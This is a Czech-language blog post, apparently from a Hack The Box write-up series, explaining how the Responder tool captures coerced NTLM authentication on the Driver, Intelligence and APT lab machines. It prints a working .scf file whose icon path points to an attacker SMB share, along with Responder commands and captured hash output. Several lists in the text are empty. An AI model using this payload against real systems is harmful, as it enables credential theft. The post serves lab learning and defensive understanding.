tom@home.htb:~$

Blog o HTB

28 October 2020

Responder

Úvod a kontext

Responder je v tomhle projektu důležitý hlavně jako praktický nástroj pro okamžik, kdy se podaří přinutit Windows nebo jinou službu, aby se sama autentizovala směrem k útočníkovi. Sám o sobě nevytváří coercion ani neřeší celý útok. Jeho hodnota je v tom, že umí tuto vynucenou autentizaci zachytit a převést do materiálu, se kterým se dá dál pracovat.

Na Driveru zachytí NTLMv2 hash účtu tony přes .scf soubor. Na Intelligence přijme HTTP autentizaci z Invoke-WebRequest -UseDefaultCredentials. Na APT zachytí dokonce machine account APT$, což dobře ukazuje, že nejde jen o lidské identity. Prakticky související širší vzorec rozebírám i v článku NTLM coercion a vynucená autentizace.

Co Responder v praxi řeší

Responder je užitečný tehdy, když už existuje cesta, jak vyvolat odchozí autentizaci:

V takové chvíli Responder neřeší “jak obelstít cíl”. Řeší:

Nejčastější scénáře využití v tomto projektu

.scf soubor a SMB autentizace

Na Driveru je použití velmi čisté. Po nahrání .scf souboru s UNC cestou Windows při vykreslení ikony sáhne na share útočníka a Responder zachytí NTLMv2 hash účtu tony.

[Shell]
Command=2
IconFile=\\10.10.14.11\share\random.ico
[Taskbar]
Command=ToggleDesktop
responder -wrf -I tun0

Výstup:

[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:...

Tady je prakticky zásadní správně oddělit příčinu a následek:

Interní skript s UseDefaultCredentials

Na Intelligence je situace jiná. Žádný .scf soubor ani kliknutí uživatele. Rozhoduje automatizační skript downdetector.ps1, který pravidelně volá:

Invoke-WebRequest -UseDefaultCredentials

Jakmile šlo přidat vlastní DNS záznam webthacker.intelligence.htb, skript navázal spojení na útočníkův server a Responder zachytil NTLMv2 hash Ted.Graves.

sudo responder -I tun0 -A

To je prakticky důležité proto, že dobře ukazuje, jak málo “útočně” může takový trigger vypadat. Není potřeba zranitelná aplikace. Stačí provozní automatizace, která důvěřuje internímu jménu.

Machine account a technická identita

Na APT je nejzajímavější, že zachycená autentizace nepatří člověku, ale účtu stroje:

[SMB] NTLMv1 Username : HTB\APT$

To je výborný praktický příklad toho, proč je chyba vnímat Responder jen jako nástroj na “hesla uživatelů”. V některých řetězcích je technická identita cennější než běžný účet, protože vede k:

Kdy je Responder nejlepší volba

Největší smysl dává tehdy, když:

Tím dalším krokem může být:

Bez tohoto návazného kroku je Responder spíš jen pasivní sběr.

Co Responder neumí vyřešit za vás

Responder sám:

Na Driveru byl zachycený účet okamžitě zajímavý, protože WinRM byl dostupný a heslo padlo. Na Intelligence byl hash mezikrokem k dalšímu doménovému řetězci. Na APT měl cenu machine account. Praktický dopad se tedy liší případ od případu.

Nejčastější chyby při použití

Záměna Responderu za coercion techniku

Tohle je nejčastější omyl. Responder není ten, kdo nutí cíl se autentizovat. Jen stojí na straně útočníka a čeká na spojení, které vyvolal jiný krok.

Přecenění samotného hashe

Zachycený hash ještě není shell ani admin. Je to materiál, se kterým je potřeba dál pracovat:

Ignorování typu účtu

Jestli se autentizuje:

zásadně mění další krok i skutečný dopad.

Nejčastější praktické scénáře

Po footholdu objevíte UNC trust nebo automatizaci s implicitní autentizací

Pak má smysl postavit Responder a ověřit, kdo se skutečně autentizuje. To je APT a Intelligence.

Máte souborový vektor, který donutí Windows sáhnout na váš share

To je čistý případ Driveru.

Potřebujete potvrdit, zda se dá z vynucené autentizace něco vytěžit

Pak Responder poskytne první tvrdý důkaz: jaký účet a jaký protokol jsou ve hře.

Související články v projektu

Co si odnést do praxe

Další Související Články V Projektu

HTB Stroje

Techniky

Nástroje

tags: nastroje - windows - ntlm - smb - llmnr - coercion